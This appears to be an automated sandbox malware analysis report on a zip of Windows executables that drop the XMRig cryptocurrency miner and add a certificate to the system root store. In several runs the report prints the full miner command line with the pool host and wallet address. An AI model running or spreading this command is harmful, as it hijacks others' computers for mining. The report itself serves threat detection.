Malware Analysis Report

2024-09-10 00:25

Sample ID: 240613-g8xxkaxdnh
Target: packer.zip
SHA256: 2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Tags: xmrig, miner
Score: 10/10


Analysis Overview

score
10/10

SHA256

2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293

Threat Level: Known bad

The file packer.zip was found to be: Known bad.

Malicious Activity Summary

xmrig miner

XMRig Miner payload

xmrig

Executes dropped EXE

Unsigned PE

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 06:29

Signatures

Unsigned PE


Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:34

Platform

win10v2004-20240226-en

Max time kernel

1801s

Max time network

1819s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A

Suspicious behavior: LoadsDriver


Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4076 --field-trial-handle=2280,i,11703952675008463361,17436195144517971517,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3588 --field-trial-handle=2280,i,11703952675008463361,17436195144517971517,262144 --variations-seed-version /prefetch:8

Network


Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6


Analysis: behavioral5

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:34

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1795s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network


Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6


Analysis: behavioral7

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:35

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3640,i,14648456027158448592,4956305794400220180,262144 --variations-seed-version --mojo-platform-channel-handle=3212 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3880,i,14648456027158448592,4956305794400220180,262144 --variations-seed-version --mojo-platform-channel-handle=3144 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:35

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4324,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=4232 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3992,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=3736 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:38

Platform

win10v2004-20240508-en

Max time kernel

1781s

Max time network

1793s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:44

Platform

win10v2004-20240508-en

Max time kernel

1655s

Max time network

1668s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:44

Platform

win10v2004-20240508-en

Max time kernel

1655s

Max time network

1668s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:35

Platform

win10v2004-20240226-en

Max time kernel

1798s

Max time network

1816s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A

Suspicious behavior: LoadsDriver


Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4192 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4028 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

Network


Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:36

Platform

win10v2004-20240508-en

Max time kernel

1691s

Max time network

1703s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:40

Platform

win10v2004-20240508-en

Max time kernel

1660s

Max time network

1673s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:31

Platform

win10v2004-20240508-en

Max time kernel

1724s

Max time network

1736s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:33

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1802s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4188,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4100,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=1392 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:39

Platform

win10v2004-20240508-en

Max time kernel

1784s

Max time network

1797s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
NL 52.142.223.178:80 tcp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:41

Platform

win10v2004-20240508-en

Max time kernel

1796s

Max time network

1802s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:43

Platform

win10v2004-20240508-en

Max time kernel

1786s

Max time network

1798s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:44

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1791s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 512 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 512 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main.exe

"C:\Users\Admin\AppData\Local\Temp\main.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:34

Platform

win10v2004-20240226-en

Max time kernel

1799s

Max time network

1810s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5144 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=560 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:39

Platform

win10v2004-20240508-en

Max time kernel

1695s

Max time network

1708s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:44

Platform

win10v2004-20240508-en

Max time kernel

1593s

Max time network

1606s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:37

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 131.253.33.237:443 g.bing.com tcp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 237.33.253.131.in-addr.arpa udp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp

Files

